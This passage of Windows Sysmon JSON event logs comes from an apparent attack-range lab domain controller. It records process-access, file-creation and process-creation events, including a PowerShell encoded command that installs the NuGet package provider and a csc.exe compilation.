C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.704","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.704\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-00104D890600}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.704","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-00104D890600}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:53.579\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.dll\r\nCreationUtcTime: 2020-08-01 07:58:53.579","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:53.579","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.dll","CreationUtcTime":"2020-08-01 07:58:53.579","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.cmdline\r\nCreationUtcTime: 2020-08-01 07:58:53.579","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.cmdline","CreationUtcTime":"2020-08-01 07:58:53.579","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.588\r\nProcessGuid: {41C8662E-20BD-5F25-0000-0010C0A90600}\r\nProcessId: 1204\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nParentProcessId: 2608\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.588","ProcessGuid":"{41C8662E-20BD-5F25-0000-0010C0A90600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\01p3xkle\\01p3xkle.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","ParentProcessId":"2608","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4475,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4476,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4477,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:53","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4478,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.579\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.579","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea